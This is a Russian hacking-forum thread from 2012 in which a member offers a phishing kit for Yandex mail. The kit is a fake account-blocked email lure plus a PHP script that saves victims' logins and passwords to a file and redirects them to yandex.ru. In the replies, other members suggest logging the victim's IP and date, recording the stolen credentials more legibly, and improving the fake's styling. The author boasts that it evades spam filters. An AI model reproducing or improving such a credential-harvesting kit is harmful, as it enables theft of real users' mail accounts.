HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 03.05.2012, 01:00
stivens20
Постоянный
Регистрация: 14.12.2011
Сообщений: 310
С нами: 7585526

Репутация: 2
По умолчанию

Приветствую вас форумчане,модераторы и Админ!
Представляю к вашему вниманию Новый яндекс в теле письма.
Фейк яндекс легко найдет общий язык с антиспамерами! И доходит хорошо.

СКРИН

HTML highlight

Код:
 

 

Создать почту

 

Здравствуйте уважаемый пользователь!

В связи с подозрениями на рассылку рекламных писем (спама) с вашего 
электронного адреса
 администрация вынуждена заблокировать Вашу учетную 
запись. Для продолжения пользования электронным ящиком, Вам необходимо 
подтвердить, что Ваш электронный адрес не используется спам-ботом для рассылки рекламных 
писем.
Скрипт:

PHP highlight

Код:
Код:
<?PHP
$email=$_POST['login']; 
$Pass=$_POST['passwd']; 
$Domain=$_POST['domain']; 

$log=fopen("base.php","a+"); 
fwrite($log,"\n  login:$email$domain@yandex.ru
pass:$Pass\n"); 
fclose($log); 
header("Location: http://www.yandex.ru");

Удачного взлома!
 
Ответить с цитированием

  #2  
Старый 04.05.2012, 01:00
KzBOXer
Участник форума
Регистрация: 30.10.2011
Сообщений: 284
С нами: 7650326

Репутация: 4
По умолчанию

Не плохо бы оформление сделать, так как яндекс всегда дружил с красотой.

А в базу помимо этого можно внести дату + ip.

Вот что не понятно:
1)Зачем
code:

$Domain = $_POST['domain']

вот это?
В страничке, в коде и намека на это нет.
2) В базе у тебя будет идти в строчку скорее всего все, при 100 записях голова закружиться.

code:

fwrite($log,"\n login:$email$domain@yandex.ru
pass:$Pass \n");

Тут ты ничего не поймешь, раздели их | палками, или как твоей душе угодно. Вообще, я бы сделал так:

code:

$login|Pass:$passwd| ---- IP:$ip | Date:$Dat"; // Вот тут внесем все в одну переменную для того, чтобы все шло в столбик, а не в строку, так же ниже добавим br. br без внесения в одну переменную не работала бы.


$log = fopen("base.php","a+");
fwrite($log,"\n $zapis
\n"); // Вот как то так
fclose($log);
header("Location: http://www.yandex.ru"); // Не знаю, что то с header-ом у меня на хосте проблемы были..

Вообще могу ошибиться по синтаксису где то, но не должен
Да и кстати, яндексу пофиг на домен, все равно что @yandex.ru, @yandex.ua, @yandex.kz и т.д. Можно сказать один пользователь имеет больше 7 ящиков в одной учетки. Удобно.

Ответь насчет пункта 1.
Сам написал, м? Интересно, для чего просто пункт 1.
 
Ответить с цитированием

  #3  
Старый 04.05.2012, 01:00
Suicide[VII]
Постоянный
Регистрация: 15.04.2011
Сообщений: 396
С нами: 7935446

Репутация: 49
По умолчанию

Хм.. обратил внимание на то что используются теги ,, а самого table типо - ,в коде нет.
 
Ответить с цитированием

  #4  
Старый 04.05.2012, 01:00
stivens20
Постоянный
Регистрация: 14.12.2011
Сообщений: 310
С нами: 7585526

Репутация: 2
По умолчанию

KzBOXer Пробовал красить фейк дизайн ни ого-го знаю.покрасил фейк до этого но не доходило.

Цитата:

Сообщение от KzBOXer

Ответь насчет пункта 1.
Сам написал, м? Интересно, для чего просто пункт 1.

тему создавал ночью воти записал.

На счет ip и даты это на ваше усмотрение кому как хотя можно без них.
 
Ответить с цитированием

  #5  
Старый 04.05.2012, 01:00
KzBOXer
Участник форума
Регистрация: 30.10.2011
Сообщений: 284
С нами: 7650326

Репутация: 4
По умолчанию

Цитата:

Сообщение от stivens20

На счет ip и даты это на ваше усмотрение кому как хотя можно без них.

Но то что привел ты это выглядело бы в строку да еще и слитно.

Цитата:


тему создавал ночью воти записал.



Причем тут ночь? Не понимаю..

С античата пади опять слизал
 
Ответить с цитированием

  #6  
Старый 04.05.2012, 01:00
stivens20
Постоянный
Регистрация: 14.12.2011
Сообщений: 310
С нами: 7585526

Репутация: 2
По умолчанию

Цитата:

Сообщение от KzBOXer

Причем тут ночь? Не понимаю..

С античата пади опять слизал

При том едва ли засыпая создал тему. Нет античата ни чего не тащил все сам сделал

Цитата:

Сообщение от KzBOXer

Но то что привел ты это выглядело бы в строку да еще и слитно.

Чуть-чуть было слитно так можно подправить под себя.
 
Ответить с цитированием

  #7  
Старый 04.05.2012, 01:00
Yorvet
Флудер
Регистрация: 19.08.2011
Сообщений: 2,281
С нами: 7754006

Репутация: 115


По умолчанию

Фейк есть, да, но честно - на двоечку с плюсом только тянет, как оформление, так и код обработчика.
 
Ответить с цитированием

  #8  
Старый 04.05.2012, 01:00
stivens20
Постоянный
Регистрация: 14.12.2011
Сообщений: 310
С нами: 7585526

Репутация: 2
По умолчанию

Цитата:

Сообщение от Yorvet

Фейк есть, да, но честно - на двоечку с плюсом только тянет, как оформление, так и код обработчика.

На счет оформления я уже писал и не раз крашенный фейк яндекс почта не приходит вот так и получилось.
 
Ответить с цитированием

  #9  
Старый 05.05.2012, 01:00
Yorvet
Флудер
Регистрация: 19.08.2011
Сообщений: 2,281
С нами: 7754006

Репутация: 115


По умолчанию

Дело не в цветах, а в стиле.
 
Ответить с цитированием

  #10  
Старый 05.05.2012, 01:00
stivens20
Постоянный
Регистрация: 14.12.2011
Сообщений: 310
С нами: 7585526

Репутация: 2
По умолчанию

Согласен. Вот скрин http://rghost.ru/37918938/image.png на мой взгляд немного лучше.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...